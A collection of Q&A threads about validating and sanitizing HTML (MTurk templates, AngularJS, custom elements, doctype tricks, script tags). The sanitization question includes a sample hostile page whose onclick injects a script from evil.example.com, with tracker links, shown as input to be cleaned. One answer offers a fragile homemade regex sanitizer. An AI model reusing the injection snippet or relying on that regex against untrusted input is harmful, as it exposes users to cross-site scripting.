Mechanical Turk Failure to Parse HTML - how best to check it?

When trying a test batch of a simple HIT, I discovered that the submit button does not work. I then noticed that, looking at the Layout ID, it says:
There was an error parsing the HTML5 data in your hit template.
This was just a quickie HIT that I built by hand based on an existing template, so I figure I must have messed up the HTML somewhere while editing it.
When I try to copy/paste the source of my HIT into the W3 validator, the things it complains about are not parts of the template that I touched; mostly they stem from the fact that my source is not a complete HTML document, because MTurk will be wrapping it:
Warning: Consider adding a lang attribute to the html start tag to declare the language of this document.
Error: Start tag seen without seeing a doctype first. Expected <!DOCTYPE html>.
Error: Element head is missing a required instance of child element title.
Warning: The type attribute for the style element is not needed and should be omitted.
Is there an easy way to access the full wrapped HTML of the HIT for validation? Or is there some better way of troubleshooting my HTML?

You're correct that MTurk will wrap the HTML you provide. You can see the boilerplate XML it will add in the documentation for HTMLQuestion. Those docs are intended for developers using the API, but they show you what's happening with your HTML.
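The wrapper is roughly of this shape (sketched from those docs; the FrameHeight value here is just an example):
<HTMLQuestion xmlns="http://mechanicalturk.amazonaws.com/AWSMechanicalTurkDataSchemas/2011-11-11/HTMLQuestion.xsd">
<HTMLContent><![CDATA[
<!DOCTYPE html>
... your HIT markup ...
]]></HTMLContent>
<FrameHeight>600</FrameHeight>
</HTMLQuestion>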
That said, it shouldn't matter. Just make valid HTML and you'll be okay. For example, the <title> tag won't be shown when Workers do your task, but leaving it in won't harm anything.
Also, a common mistake is to omit <!DOCTYPE html> on the first line. It's required by the HTML spec, but browsers aren't strict about it, so many people leave it out. MTurk and the W3C validator, however, will both bark at you if you omit it.
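A minimal valid shell, then, looks something like this (the title text is arbitrary, since Workers never see it):
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="utf-8">
<title>My HIT</title>
</head>
<body>
<!-- your HIT markup here -->
</body>
</html>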

How to detect invalid HTML in AngularJs (unmatched tags)

For plain old HTML, I use the W3C validation service, but it has objections to Angular directives.
I am having problems with "WARNING: Tried to load angular more than once", and some possible solutions that I read suggest that it is caused by malformed HTML, specifically unclosed tags.
How can I detect such problems?
Obviously, I have checked that I am not directly including Angular twice.
I'd say proper indentation and a good IDE are the best tools you have on this front. Personally I use PHPStorm (WebStorm would do the same) for my Angular development; it highlights warnings for the Angular attributes by default, and flags errors like unclosed tags and quotes in red.
Indentation helps you spot unclosed tags, and the IDE helps with unclosed quotation marks on attributes, which are probably the two issues most likely to cause trouble.
Angular doesn’t “see” your raw HTML
The real trick here is that JavaScript (and, in turn, Angular) does not work directly with your HTML. It works with the page's DOM, which is created from your HTML.
When a browser creates a DOM from HTML, one of the major things it does is "auto-correct" any errors in the HTML. So Angular won't even see the errors in your HTML; it will just see the resulting "auto-corrected" DOM. (Of course, the more errors in your HTML, the more likely something will be auto-corrected in a way that causes you a problem.)
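You can watch this happen. A quick sketch using DOMParser (the sample markup is deliberately mis-nested):
// Parse broken HTML and inspect the DOM the browser builds from it.
var doc = new DOMParser().parseFromString(
    "<div><b>bold<i>both</b>italic?</i></div>", "text/html");
console.log(doc.body.innerHTML);
// Typically: <div><b>bold<i>both</i></b><i>italic?</i></div>
// The mis-nesting was silently repaired; that repaired tree is all Angular ever sees.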
In theory, you could compare a page’s HTML source with the resultant DOM to find differences which might be errors. In practice, that would be highly problematic, and prone to reporting a high volume of false positives.
How, then, can we validate HTML from web sites?
If you would like to validate the HTML markup of a web page, the best way is to install your own instance of a well-supported HTML validator (like the W3C's validator) and hook into that.
You can capture a page’s DOM with a little jQuery (which you most likely have if you are using AngularJS):
var domString = $("html").prop("outerHTML");
Then, just post that string as input to your favorite validator.
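For example, a sketch of posting to the W3C "Nu" checker (the out=json parameter asks for machine-readable results; this assumes the checker's CORS policy allows requests from your origin, and note that outerHTML does not include the doctype, so we prepend one):
// Capture the live DOM and POST it to the checker.
var domString = "<!DOCTYPE html>\n" + $("html").prop("outerHTML");
$.ajax({
    url: "https://validator.w3.org/nu/?out=json",
    type: "POST",
    data: domString,
    contentType: "text/html; charset=utf-8",
    processData: false
}).done(function (result) {
    console.log(result.messages); // each message carries a type, location, and description
});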
I think you would need to compare the validation results for this DOM string with those for the raw HTML, as an error in the raw HTML is more likely to be where your problem is.

W3C validation for <ui-select>

I am using angular-ui-select within a website where the styled select fields are configured with their own tag named ui-select. This works great, but running a W3C validation leads to this error:
Element ui-select not allowed as child of element div in this context. (Suppressing further errors from this subtree.)
Here's an example code:
<!doctype html>
<html lang="en">
<head><title>x</title></head>
<body>
<div>
<ui-select></ui-select>
</div>
</body></html>
I understand that <ui-select> is not expected to be there, but how can I handle this better?
Can I wrap it in a different tag, or is there a different approach for ui-select instead of using HTML markup?
W3C HTML5 validator maintainer here. The short answer, with regard to the validator behavior right now, is that the validator is going to emit errors for any custom elements you use in documents, and currently there's no way for you as a user to work around that. It's going to stay that way for some time longer, until we get around to figuring out a solution.
We're having some ongoing discussions about how to solve this. Changing the validator to just ignore any element name with a hyphen is not viable as a complete solution, because the consequence of that is we could then not practically check any child elements it might have—we'd just have to ignore the entire subtree, because to do otherwise would lead to other errors. So that's way short of being an ideal solution.
Anyway, I'd love to find a good way to solve this, so if others have ideas I'd like to hear them. Two good places to send ideas/proposals are the public-webapps@w3.org mailing list (https://lists.w3.org/Archives/Public/public-webapps/) and the whatwg@whatwg.org mailing list (https://whatwg.org/mailing-list#specs).
One idea I've thought of myself is, we could just have the validator treat all custom elements in the same way it currently treats the <div> element (as far as where it's allowed in a document and what child elements it's allowed to contain). That's also short of ideal, but at least it would give a way to check for errors in descendant elements in the custom element's subtree.
Update 2017-02-06: the W3C HTML Checker now supports custom elements
So, I added support for custom elements to the W3C HTML Checker (validator) on 2016-12-16 and a few days later refined it to do more detailed checking for prohibited names.
The trick I ended up figuring out to implement it in the checker architecture (which is at its core a RelaxNG grammar/schema-based validator) was to add a pre-processing filter that takes any element with a hyphen in its name and puts it in a separate XML namespace.
Then I updated the RelaxNG schema to allow any elements from that XML namespace anywhere. (Which is ironic because I pretty much hate XML namespaces and all the problems they cause.)
So we’re now looking at doing something similar for custom-attribute names—probably just by defining those as being any attribute names that contain a hyphen (like custom-element names).
But the HTML checker can’t be changed to allow custom-attribute names until the HTML spec is updated to allow them. For that, see the proposal being discussed in the HTML-spec issue tracker.
That's indeed a long-known issue with AngularJS.
A few things you can do:
Instead of using the element <ui-select>, you can use <div ui-select>, but that will still fail on the attribute.
An attribute prefixed with data- will pass validation (AngularJS normalizes x- and data- prefixes when matching directives), but I am not sure ui-select supports the attribute form; see the sketch below.
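For illustration, the attribute form of the earlier example might look like this (whether ui-select actually honors the data- prefix is an assumption you would have to verify):
<!doctype html>
<html lang="en">
<head><title>x</title></head>
<body>
<div>
<div data-ui-select></div>
</div>
</body></html>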
W3C HTML validation is useful, but I think it's mostly important for HTML emails so they don't get screened as spam. It's also good for search engines, but really not that critical.
If you look at 'why validate', the reasons are mostly for cleanliness, ease of debugging, and overall good practice.
Angular (un?)fortunately expands the realm of possibilities for HTML5, in a way that, naturally, deviates from the latest specifications for HTML.
We are having the same problem using Knockout custom components.
http://knockoutjs.com/documentation/component-overview.html
I added a suggestion for a minor enhancement to the validator for users who want to use custom elements even though the specification is not yet final (http://w3c.github.io/webcomponents/spec/custom/#custom-tag-example):
https://github.com/validator/validator/issues/94

Non-formatting tags outside the html tag

I have a rather bizarre use case.
I need a tag at the top of an HTML document that will not be used in formatting but will contain some information (flags & data) for the parsing entity to act upon.
Normally comments are used for this:
<!-- foo = bar -->
<html>
etc.
Now we can strip 'foo' from the comment when the html is parsed and act upon its value 'bar'.
However I am now in the situation that one of the intermediate systems strips all comments from the html as it sends it along.
So my question is: What other tags can go outside of the html tag without breaking the html specs (too much)?
I know of the <!doctype> tag, but you cannot really put data in there without breaking something.
NB:
yes, I know this kind of signalling is ugly, but these are not my systems, I must provide such a flag.
all comments are stripped
JS is not executed (yet), so we can't do it via the DOM.
This is a less-than-ideal situation, but you can add anything inside the doctype tag, like this:
<!doctype html public 'You are free to add anything here'>
I'm not sure how much data is allowed in there, but this shouldn't affect how the markup is parsed. Be aware, though, that an unrecognized public identifier will put browsers into quirks mode, which can change how the page is rendered.
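The smuggled value comes back out of any DOM-based parser as the doctype's public identifier. A sketch (browser-side; on a server you would need a DOM library such as jsdom):
// Read the flag back from the parsed document's doctype.
var flag = document.doctype ? document.doctype.publicId : null;
console.log(flag); // "You are free to add anything here"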

What can I use to sanitize received HTML while retaining basic formatting?

This is a common problem, I'm hoping it's been thoroughly solved for me.
In a system I'm doing for a client, we want to accept HTML from untrusted sources (HTML-formatted email and also HTML files), sanitize it so it doesn't have any scripting, links to external resources, and other security/etc. issues; and then display it safely while not losing the basic formatting. E.g., much as an email client would do with HTML-formatted email, but ideally without repeating the 347,821 mistakes that have been made (so far) in that arena. :-)
The goal is to end up with something we'd feel comfortable displaying to internal users via an iframe in our own web interface, or via the WebBrowser class in a .Net Windows Forms app (which seems to be no safer, possibly less so), etc. Example below.
We recognize that some of this may well muck up the display of the text; that's okay.
We'll be sanitizing the HTML on receipt and storing the sanitized version (don't worry about the storage part — SQL injection and the like — we've got that bit covered).
The software will need to run on Windows Server. COM DLL or .Net assembly preferred. FOSS markedly preferred, but not a deal-breaker.
What I've found so far:
The AntiSamy.Net project (but it appears to no longer be under active development, being over a year behind the main — and active — AntiSamy Java project).
Some code from our very own Jeff Atwood, circa three years ago (gee, I wonder what he was doing...).
The HTML Agility Pack (used by the AntiSamy.Net project above), which would give me a robust parser; then I could implement my own logic for walking through the resulting DOM and filtering out anything I didn't whitelist. The agility pack looks really great, but I'd be relying on my own whitelist rather than reusing a wheel that someone's already invented, so that's a ding against it.
The Microsoft Anti-XSS library
What would you recommend for this task? One of the above? Something else?
For example, we want to remove things like:
script elements
link, img, and such elements that reach out to external resources (probably replace img with the text "[image removed]" or some such)
embed, object, applet, audio, video, and other tags that try to create objects
onclick and similar DOM0 event handler script code
hrefs on a elements that trigger code (even links we think are okay we may well turn into plaintext that users have to intentionally copy and paste into a browser).
__________ (the 722 things I haven't thought of that are the reason I'm looking to leverage something that already exists)
So for instance, this HTML:
<!DOCTYPE html>
<html>
<head>
<title>Example</title>
<link rel="stylesheet" type="text/css" href="http://evil.example.com/tracker.css">
</head>
<body>
<p onclick="(function() { var s = document.createElement('script'); s.src = 'http://evil.example.com/scriptattack.js'; document.body.appendChild(s); })();">
<strong>Hi there!</strong> Here's my nefarious tracker image:
<img src='http://evil.example.com/xparent.gif'>
</p>
</body>
</html>
would become
<!DOCTYPE html>
<html>
<head>
<title>Example</title>
</head>
<body>
<p>
<strong>Hi there!</strong> Here's my nefarious tracker image:
[image removed]
</p>
</body>
</html>
(Note we removed the link and the onclick entirely, and replaced the img with a placeholder. This is just a small subset of what we figure we'll need to strip out.)
This is an older, but still relevant question.
We are using the HtmlSanitizer .Net library, which:
is open-source
is actively maintained
doesn't have the problems of the Microsoft Anti-XSS library
is unit tested against the OWASP XSS Filter Evasion Cheat Sheet
is purpose-built for this task (in contrast to the HTML Agility Pack, which is a parser)
It's also available on NuGet.
I sense you will definitely need a parser that can generate an XML/DOM source so that you can apply a filter to it to produce what you are looking for.
See if the HtmlTidy, Mozilla, or HtmlCleaner parsers can help. HtmlCleaner has a lot of configurable options which you might also want to look at; specifically, the transform section allows you to skip the tags you don't require.
I would suggest another approach. If you control the method by which the HTML is viewed, you can remove all threats by using an HTML renderer that has no ECMAScript engine or any XSS capability. I see you are going to use the built-in WebBrowser object, and rightly so: you want to produce HTML that cannot be used to attack your users.
I recommend looking for a basic HTML display engine, one that cannot parse or understand any of the scripting functionality that would make you vulnerable. All the JavaScript would then simply be ignored.
This does have another problem though. You would need to ensure that the viewer you are using isn't susceptible to other types of attacks.
I suggest looking at http://htmlpurifier.org/. Their library is pretty complete.
Interesting problem; I spent some time on it, because there are a lot of things we want to remove from user input, and even if I made a long list of things to be removed, HTML can evolve later on and my list would have holes.
Nonetheless, I want users to input some simple things like bold, italic, paragraphs... pretty simple.
No doubt the list of allowed things is shorter, and if HTML changes later on, that won't make holes in my list unless HTML stops supporting these simple things.
So I started thinking the other way around: state only what you allow. With great pain, because I'm not an expert at regex (so please, regex people, correct or improve this), I coded this expression, and it has been working for me since before HTML5 arrived:
replace(/(?!<[/]?(b|i|p|br)(\s[^<]*>|[/]>|>))<[^>]*>/gi,"")
(b|i|p|br) <- this is the list of allowed tags; feel free to add some.
This is a starting point, which is why regex people should improve it to also remove the attributes, like onclick.
If I do this:
(?!<[/]?(b|i|p|br)(\s*>|[/]>|>))<[^>]*>
tags with onclick or other attributes will be removed, but the corresponding closing tags will remain; and after all, we don't want those tags removed, we just want to remove their attributes.
Maybe a second regex pass with
(?!<[^<>\s]+)\s[^</>]+(?=[/>])
Am I right? Can this be composed into a single pass?
We still track no relation between opening and closing tags; no great deal so far.
Can the attribute removal be written to remove everything not on a whitelist? (Possibly, yes.)
One last problem: when removing tags like script, the content remains. That's desirable when removing font, but not script. Well, we can do a first pass with
<(script|object|embed)[^>]*>.*</\1>
which will remove certain tags and their content. But it's a blacklist, meaning you have to keep an eye on it in case HTML changes.
Note: all of these use the "gi" flags.
Edit:
I joined all of the above into this function:
String.prototype.sanitizeHTML = function (white, black) {
    if (!white) white = "b|i|p|br"; // whitelist: tags to retain
    if (!black) black = "script|object|embed"; // blacklist: tags removed together with their content
    // one pass: blacklisted tag plus content | non-whitelisted tags | attributes on remaining tags
    var e = new RegExp("(<(" + black + ")[^>]*>.*</\\2>|(?!<[/]?(" + white + ")(\\s[^<]*>|[/]>|>))<[^<>]*>|(?!<[^<>\\s]+)\\s[^</>]+(?=[/>]))", "gi");
    return this.replace(e, "");
};
- blacklist -> tag and its content are removed completely
- whitelist -> tags are retained
- other tags are removed, but their content is retained
- all attributes of the whitelisted (remaining) tags are removed
There is still room for a whitelist of attributes (not implemented above), because if I want to preserve img then src must stay... and what about tracking images?
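For illustration, here is the function above applied to a small made-up snippet:
var dirty = '<p onclick="evil()">Hi <script>attack()</script><em>there</em></p>';
console.log(dirty.sanitizeHTML());
// -> '<p>Hi there</p>'
// script vanishes with its content (blacklist), em is stripped but its text is
// kept, and the onclick attribute is removed from the whitelisted p.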

HTML validator which ignores everything inside SCRIPT tags

The W3C HTML validator reports errors on lines that are inside <script> tags. This creates a lot of noise in the validation output. I can wrap my own script in CDATA, but I have a lot of script added dynamically by third-party controls.
Is there an HTML validator which can ignore everything in all <script> sections?
Short Bad Answer
If you wish to continue to use the w3 validator but get rid of certain errors regarding html in script tags, you can comment your JavaScript as shown in this guide. This is clearly a hack and is not recommended.
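For comparison, the CDATA wrapping the asker mentions looks like this in XHTML (the // prefixes keep the CDATA markers from being executed as JavaScript; the condition is just filler):
<script type="text/javascript">
//<![CDATA[
if (a < b && c > d) { doSomething(); }
//]]>
</script>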
Long Good Answer
The main point of a validator is to ensure your code keeps to standards. The documentation for the w3 validator points you to this guidance and the w3 itself has a guide on keeping html within script to standards.
Personally, I don't see the point of a validator that selectively ignores some standards. You can't know how any given browser will implement the W3C standard, and just because the major browsers presumably cope with errors embedded in script tags, that doesn't mean there aren't browsers that follow the standard more strictly. Furthermore, there is no guarantee that the major browsers won't change their implementations in the future to track the standard more closely, and thus break your code. It is better to fix the errors you are getting than to ignore them.
Solution:
Remove the offending third party scripts while you're validating the HTML.
It might be that Michael Robinson's suggestion or Rupert's Short Bad Answer can be done programmatically, though it might be painful to implement.
If you can put a proxy or filter in front of your page that strips or modifies the script tags on the fly, the validator will not see the scripts.
Unfortunately, stripping the scripts is only easy if you've got valid XHTML, in which case of course you mightn't really need the validator...
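A sketch of such a filter (the function name is mine, and the regex is deliberately naive; it will misbehave if a script body itself contains the string "</script>"):
// Empty out each script block before validation, so the validator sees
// well-formed placeholder tags instead of third-party JavaScript.
function stripScriptBodies(html) {
    return html.replace(/(<script\b[^>]*>)[\s\S]*?(<\/script>)/gi, "$1$2");
}
// stripScriptBodies('<script>if (a<b) x();</script>') -> '<script></script>'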
Aside from the fact that this might be fun to try, I'm in favor of Rupert's Long Good Answer.